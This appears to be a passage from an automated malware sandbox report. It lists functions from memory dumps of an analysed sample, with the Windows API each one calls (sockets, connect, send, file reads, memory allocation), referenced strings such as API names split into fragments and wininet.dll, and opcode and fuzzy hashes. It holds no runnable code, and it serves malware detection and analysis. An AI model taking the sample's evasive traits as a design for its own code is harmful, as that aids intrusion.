`, xrefs: 06D51C3D

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction ID: 38c9a43376e6e16d075ee52e036c297fbe7d18049c4f04329aba058478ebf930
Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction Fuzzy Hash: 14225D70A18A099FCB99EF28C8987AEF7E1FB58301F41422ED45ED7650DB30E556CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06D4F058, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D4F047

Strings

clos, xrefs: 06D4F00A
ket, xrefs: 06D4F01A
esoc, xrefs: 06D4F012

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction ID: add0d3ae041d45376aab7fcd80dd1729e6d2166b586946245b4ea2f8955edb89
Opcode Fuzzy Hash: b4fb87445522e583bcac549958e7f136e318ec9509d59ce0862b2de2f6cfbb67
Instruction Fuzzy Hash: CDF0F47011CB484BCB80EF149088B9AB7E0F799314F88056DE84ECB609C77685458706

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EFEC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D4F047

Strings

clos, xrefs: 06D4F00A
ket, xrefs: 06D4F01A
esoc, xrefs: 06D4F012

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction ID: 12cd0fbbc4f3af827f4d2e6c937a144a4d079e420e5dd74c5e121bb314147568
Opcode Fuzzy Hash: 922cb2de92a9cc7462d3c41426373e6679178d31bd48408d8fc66b38d9251727
Instruction Fuzzy Hash: A9F0907011CB088FCB80EF28D489BAAB7E0FB89315F5406ADE88ECB604C77685468703

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EFF2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 06D4F047

Strings

clos, xrefs: 06D4F00A
ket, xrefs: 06D4F01A
esoc, xrefs: 06D4F012

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction ID: 647bfac49e7e9f8c6193d2c9655c08186edafc6f8b0d31723296dfad5ed01154
Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction Fuzzy Hash: 65F01770618B089FCB84EF18D488B6AB6E0FB89314F54466DA85ECB244C77589468B02

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EF72, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06D4EFD1

Strings

conn, xrefs: 06D4EF9A
ect, xrefs: 06D4EFA1

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction ID: 43e1fe4700462e0a747712e8e96588ede9df817938097ffee839941724282b9a
Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction Fuzzy Hash: 24012C70618A0C8FCBC4EF5CE488B55B7E0FB59314F1541AEE90DCB266CA74D9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EF6E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 06D4EFD1

Strings

conn, xrefs: 06D4EF9A
ect, xrefs: 06D4EFA1

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction ID: b93a60acc32e0b1e528e98cf361802a51d22e03df3a383fb97e00b877d0546ad
Opcode Fuzzy Hash: 0e87c5066886d73f66ad042aa74cf2e6c0982b3a705251b8bd229a10c4884a4e
Instruction Fuzzy Hash: 94017C70618A0C8FCBC4EF1CE488B55B7E0FB59310F1645AED84DCB266CA74D9858BC1

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EDEF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 06D4EE51

Strings

sock, xrefs: 06D4EE19

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction ID: a57b0db301f65aba86e42e817a77a79254a3e221487696a775cbaabfd1e41d0e
Opcode Fuzzy Hash: 35d02e8bf7b7ef43e9c2e6124d276c4e2bea41bc627b1cd2210aee80682eb4f6
Instruction Fuzzy Hash: BB1170705187488FCB84EF189444B45BBE0FB59310F0645EED44DCF266C2B4D9468B92

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EEF2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 06D4EF53

Strings

send, xrefs: 06D4EF1A

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction ID: 478db8d59f2591c0e64199b3711e748fa31e9cd983737507d42f23f4f157a268
Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction Fuzzy Hash: 3F012570518A0C8FDBC4EF1CE448B1577E0FB58314F1546AED85DCB266C670D8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 06D4EDF2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 06D4EE51

Strings

sock, xrefs: 06D4EE19

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction ID: 5159c3305b8ba3094de3b40963df31fbf8133e9bf9b8f5858abd983476789f45
Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction Fuzzy Hash: B9014F70618A0C8FCB84EF1CE048B55BBE0FB59314F1545AEE85EDB266D7B0C9858B86

Uniqueness

Uniqueness Score: -1.00%

Function 06D472C9, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 06D4731D

Memory Dump Source

Source File: 00000002.00000002.503825031.0000000006D20000.00000040.00000001.sdmp, Offset: 06D20000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction ID: 6b9408e2ce2588aa9d9b3f9cf6e0139fd123b68659953a93c7771f83e45299f8
Opcode Fuzzy Hash: 8b3b5490eaa0f5a1cab87b82b9e561739e4acbeb8a6e6c65e69d485847707252
Instruction Fuzzy Hash: 6A311874A04B09DFDBA4AF6984883A9B7A1FB54300F14467ECD2DCA206CB749954CFE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6240 Parent PID: 3472 rundll32.exeCOMMON

Executed Functions

Function 02DA9F40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02DA4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DA4B87,007A002E,00000000,00000060,00000000,00000000), ref: 02DA9F8D

Strings

.z`, xrefs: 02DA9F7D, 02DA9F88

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 2abc137dfdf9cbf7c67b780c7206dac7092730517ef53a02cda5d3d7bb05df89
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 14F0B2B2201208ABCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DA9FF0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DA4D42,5EB6522D,FFFFFFFF,02DA4A01,?,?,02DA4D42,?,02DA4A01,FFFFFFFF,5EB6522D,02DA4D42,?,00000000), ref: 02DAA035

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: b4cdd8caf48a85006086adeaa9b8cc27c9a9bc4ee75defb1562c0878b5f179e2
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 75F0A4B2200208ABCB14DF89DC90EEB77ADEF8C754F158248BA1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA120, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02D92D11,00002000,00003000,00000004), ref: 02DAA159

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: e6c168d8e6886492be3608fbf9799415c7f15535033aa7e86d295178277407a1
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 8AF015B2200208ABCB14DF89CC90EAB77ADEF88750F118248BE0897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA03A, Relevance: 1.5, APIs: 1, Instructions: 28filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02DA4D42,5EB6522D,FFFFFFFF,02DA4A01,?,?,02DA4D42,?,02DA4A01,FFFFFFFF,5EB6522D,02DA4D42,?,00000000), ref: 02DAA035

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
Instruction ID: 477fa2978663945f976afd8b1944e670b125950f9a60e6e4cb7f737bcbceb866
Opcode Fuzzy Hash: 7667df86b4670ab182bf084ea5d8498124de479297fffc57d989d6cc8a3e52e7
Instruction Fuzzy Hash: B6E01AB62040486BCB04CFA8ED94CAB77ADEF8C350B208609FA9CC3204C530E8128BB0

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA06B, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DA4D20,?,?,02DA4D20,00000000,FFFFFFFF), ref: 02DAA095

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: da1e9773d70b7f9a1a4e7e8d8054bdf5e74b5d5a734086621299e9b186e27c11
Instruction ID: 3f88953328adc8f8c9c3c3b3643086f3b2bdc6a4ee711570bf0430b74505703d
Opcode Fuzzy Hash: da1e9773d70b7f9a1a4e7e8d8054bdf5e74b5d5a734086621299e9b186e27c11
Instruction Fuzzy Hash: 66E08C71240210AFE712EB98CC44FDBBB69EF84260F0544AAB9089B281C231E60087A0

Uniqueness

Uniqueness Score: -1.00%

Function 02DAA070, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02DA4D20,?,?,02DA4D20,00000000,FFFFFFFF), ref: 02DAA095

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 3674791172adf863503805eed804c97c9a8e63a6017852950a5ba2cd1de4885a
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: BDD01776200214ABD710EB98CC85FA7BBADEF48760F154599BA189B242C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 04EE95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE95DA

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0886d807f75cb4d714338d2fa34a5b84e27156a6dd691738f4fd1f4457c2e185
Instruction ID: 30a75443e547cebba21923900c83b08f14e373b117c3fb65eeeeb8a44fe6723c
Opcode Fuzzy Hash: 0886d807f75cb4d714338d2fa34a5b84e27156a6dd691738f4fd1f4457c2e185
Instruction Fuzzy Hash: A79002A130200003610571594C15A16440E97E0245B52D0A1E2015590DD565D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE954A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64045d65037d8162fbaa8122c6959f13c8ad575313767ad9dd4b338f4b9886fc
Instruction ID: c711f427fad3934ecd77e355ec1a929f5a73e76c5418825e88f34000432e4257
Opcode Fuzzy Hash: 64045d65037d8162fbaa8122c6959f13c8ad575313767ad9dd4b338f4b9886fc
Instruction Fuzzy Hash: 15900265311000032105A5590F05907044A97D5395352D0A1F2016550CE661D8617161

Uniqueness

Uniqueness Score: -1.00%

Function 04EE96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE96EA

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3787ef85532d61637c468cd085d519499ed94e6b6e3d5b7e965ad30f8fffa289
Instruction ID: 46bd3ec33a97775439fe2fc490e2ce99fa20638449921762b36c8bad88ef9882
Opcode Fuzzy Hash: 3787ef85532d61637c468cd085d519499ed94e6b6e3d5b7e965ad30f8fffa289
Instruction Fuzzy Hash: A590027130108802F11061598C05B4A040997D0345F56D491A5425658D96D5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04EE96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE96DA

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ae037ef6dfe68f0b225ff67ce04217bd6d6e3af230c13fe8705d66a550c3625
Instruction ID: 1f4d6d57ab8cbc364daec32b470def8f992b295a338625d4c3a61c32eb8866d6
Opcode Fuzzy Hash: 2ae037ef6dfe68f0b225ff67ce04217bd6d6e3af230c13fe8705d66a550c3625
Instruction Fuzzy Hash: AD90027130100842F10061594C05F46040997E0345F52D096A1125654D9655D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE966A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f94cd7f36ddc3ad42abd5d9bdda1e1ef5248a91af435bfee9b271c09357d93f
Instruction ID: d2a7499102b1720500a9df3b8cc419217d95c8a5847f02631aa9aaba5b597f93
Opcode Fuzzy Hash: 4f94cd7f36ddc3ad42abd5d9bdda1e1ef5248a91af435bfee9b271c09357d93f
Instruction Fuzzy Hash: D290027130100802F18071594C05A4A040997D1345F92D095A1026654DDA55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE965A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb7d80e2c6a8cd770218484aa36c5e0558c1fd6ad21ccd789edd29f9af3b41f0
Instruction ID: bedf8f5b104c509aa80d361099173a2baa21f600ead395af9349da3e1441ff81
Opcode Fuzzy Hash: eb7d80e2c6a8cd770218484aa36c5e0558c1fd6ad21ccd789edd29f9af3b41f0
Instruction Fuzzy Hash: 0390027130504842F14071594C05E46041997D0349F52D091A1065694DA665DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE9FEA

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d38287bec4d7991960be9be7bf3d9f113885942638418531571a4b0200a3f086
Instruction ID: b3eca5caa63437dd704119c752eca9a14cc6c79f872ab90cd1868e110fc52592
Opcode Fuzzy Hash: d38287bec4d7991960be9be7bf3d9f113885942638418531571a4b0200a3f086
Instruction Fuzzy Hash: 3C90027131114402F11061598C05B06040997D1245F52D491A1825558D96D5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE978A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ae5fd8d10fb8f9db6292f1ff461e930eee21e1ce6437166ce83d7b72a319d5e
Instruction ID: 1ed5ff2bcc7c4b7291deca7c7f381fbc26346a723c067fd822993391f30a9956
Opcode Fuzzy Hash: 7ae5fd8d10fb8f9db6292f1ff461e930eee21e1ce6437166ce83d7b72a319d5e
Instruction Fuzzy Hash: A390026931300002F18071595C09A0A040997D1246F92E495A1016558CD955D8697361

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE971A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f882f318916ddf6929dbc2829f992bddb72a8ad2394347362b7967f6c5574c3
Instruction ID: c300d941f2efeb774fc6aa89e37473ad354554af3b6e9dc82c04b96a23fd3a44
Opcode Fuzzy Hash: 4f882f318916ddf6929dbc2829f992bddb72a8ad2394347362b7967f6c5574c3
Instruction Fuzzy Hash: 0190027130100402F10065995C09A46040997E0345F52E091A6025555ED6A5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE986A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a4d23b2e07cd7de0803d803e28fb9f9ab11dde8177a2e017a45a0cf9c988ef1
Instruction ID: 7d525f076587a148e65f1407afc694a30308926d4ea35e9c07d3a2107f77960f
Opcode Fuzzy Hash: 3a4d23b2e07cd7de0803d803e28fb9f9ab11dde8177a2e017a45a0cf9c988ef1
Instruction Fuzzy Hash: CB90027130100413F11161594D05B07040D97D0285F92D492A1425558DA696D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE984A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c7a30d7ae02a3fd59c3fa525724d959a8e2e3c12835d33fba6ba57c56d75897
Instruction ID: 15c86a9b1372a073a16e09b282243d6d060c75c51ef56176e646d518de5658f1
Opcode Fuzzy Hash: 2c7a30d7ae02a3fd59c3fa525724d959a8e2e3c12835d33fba6ba57c56d75897
Instruction Fuzzy Hash: 64900261342041527545B1594C05907440AA7E0285792D092A2415950C9566E856F661

Uniqueness

Uniqueness Score: -1.00%

Function 04EE99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE99AA

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 61e955164c9dc43917eebc25d7da86a581c4a226d5f9714b9404ef21590d83ae
Instruction ID: 13fea128ce6ab17e8f58cc42665e9f9e7d3605508d963ef8dc89d2047011b61d
Opcode Fuzzy Hash: 61e955164c9dc43917eebc25d7da86a581c4a226d5f9714b9404ef21590d83ae
Instruction Fuzzy Hash: 519002A134100442F10061594C15F060409D7E1345F52D095E2065554D9659DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE991A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 157b6fcf591f5fc2b1ead521a959cf2455a4aea83f11f5c208d086b1fe0f417d
Instruction ID: ebdeee54c47cd813593c1f2e78a8f355945539497f6b6e1868b6ddb22ace62ab
Opcode Fuzzy Hash: 157b6fcf591f5fc2b1ead521a959cf2455a4aea83f11f5c208d086b1fe0f417d
Instruction Fuzzy Hash: 419002B130100402F14071594C05B46040997D0345F52D091A6065554E9699DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04EE9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04EE9A5A

Memory Dump Source

Source File: 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp, Offset: 04E80000, based on PE: true

Associated: 00000006.00000002.491005568.0000000004F9B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.491023967.0000000004F9F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23b1cfba294002fb57c220e93db4cbcaa1f9f24f348062f4d464aa4c007a472a
Instruction ID: 3e5bf3450b53248169e2ae08048b42d50c49deb0e2e2cca9ef7ad6f9c5a97b37
Opcode Fuzzy Hash: 23b1cfba294002fb57c220e93db4cbcaa1f9f24f348062f4d464aa4c007a472a
Instruction Fuzzy Hash: 7390026131180042F20065694C15F07040997D0347F52D195A1155554CD955D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 02DA8C60, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02DA8D08

Strings

net.dll, xrefs: 02DA8CD1, 02DA8D57, 02DA8D2F, 02DA8D3B, 02DA8D63
wininet.dll, xrefs: 02DA8CBE, 02DA8CC7

Memory Dump Source

Source File: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Offset: 02D90000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: c7b4b477ee1b832759d18ad0b6c2c0adc7764b298f7aaf256b174f368e0316eb
Instruction ID: 7e6aa907736744c2bae0126a199b5f3f21119b20f13db30e94eb41dc38cfc57b
Opcode Fuzzy Hash: c7b4b477ee1b832759d18ad0b6c2c0adc7764b298f7aaf256b174f368e0316eb
Instruction Fuzzy Hash: A53160B6900644BFC724DF64D894FA7B7B9FF48700F00811DEA6AAB240D771AA50CBA4

Uniqueness

Uniqueness Score: -1.00%

